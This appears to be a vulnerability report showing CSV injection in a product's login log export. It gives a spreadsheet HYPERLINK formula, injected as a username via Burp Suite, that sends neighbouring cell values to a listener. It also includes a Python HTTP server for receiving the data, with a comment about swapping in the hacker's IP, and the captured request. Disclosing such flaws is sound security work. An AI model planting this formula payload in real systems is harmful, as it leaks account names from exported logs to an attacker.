CSV Injection Vulnerability

The product has the CSV injection vulnerability. For example, the CSV injection vulnerability is used to obtain login accounts.

When a user logs in, in the request of "/login", change the value of username to =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") by burpsuite tool.
输入图片说明

2.
Run the python script to start the HTTP service with port 8007.

from http.server import HTTPServer, BaseHTTPRequestHandler
import json

data = {'result': 'this is a test'}
# You can change  **localhost**  to the IP address of the hacker's computer.
host = ('localhost', 8007)


class Resquest(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())

if __name__ == '__main__':
    server = HTTPServer(host, Resquest)
    print("Starting server, listen at: %s:%s" % host)
    server.serve_forever()

Choose "日志管理"->"登录日志" ("Log Management"->"Login Log") to view logs, and exporting .xlsx log file.
输入图片说明

Open .xlsx log file, double-click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell. And then click the cell of =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). In this case, a request is sent to the localhost:8007.
The contents of cells B2 and B3 are admin and test1.
输入图片说明
Before double-click.

After double-click. And then click E.

A request is sent to the localhost:8007 through the browser.

5.
The HTTP service with port 8007 receives the following information:
127.0.0.1 - - [18/Jan/2022 17:04:07] "GET /?u=admintest1 HTTP/1.1" 200 -
输入图片说明